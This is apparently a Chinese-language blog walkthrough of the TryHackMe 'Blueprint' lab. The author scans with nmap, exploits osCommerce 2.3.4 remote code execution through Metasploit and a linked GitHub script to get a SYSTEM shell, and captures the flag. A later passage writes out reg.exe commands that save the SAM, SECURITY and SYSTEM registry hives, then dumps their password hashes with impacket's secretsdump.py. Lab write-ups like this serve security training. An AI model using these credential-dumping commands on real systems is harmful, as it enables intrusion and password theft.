TryHackMe-Blueprint

发布于 2022-10-28  229 次阅读


开启机器

还是先用nmap扫一下端口


目前可以发现存在一个目录遍历漏洞
尝试访问

先百度一下这个是什么系统
发现他在2.3.4版本存在RCE

搜索了下msf
存在对应的RCEexp

直接使用,填入对应的参数,成功反弹回shell

然而这个shell不好用,去git找了个脚本
https://github.com/whokilleddb/osCommerce-2.3.4-RCE-exploit

system权限
成功找到flag


这里还有第二个问题

这里方法比较多
可以添加用户RDP上去mimikatz读,或者powershell之类的
我这里直接转储

reg.exe save hklm\sam C:\xampp\htdocs\oscommerce-2.3.4\sam.save
reg.exe save hklm\security C:\xampp\htdocs\oscommerce-2.3.4\security.save
reg.exe save hklm\system C:\xampp\htdocs\oscommerce-2.3.4\system.save

转储到一半机器关了,重新开机器,转储下载

接着用impacket中的secretsdump.py模块来读取

python secretsdump.py -sam /root/Downloads/sam.save -security /root/Downloads/security.save -system /root/Downloads/system.save LOCAL

解密出结果


届ける言葉を今は育ててる
最后更新于 2022-10-28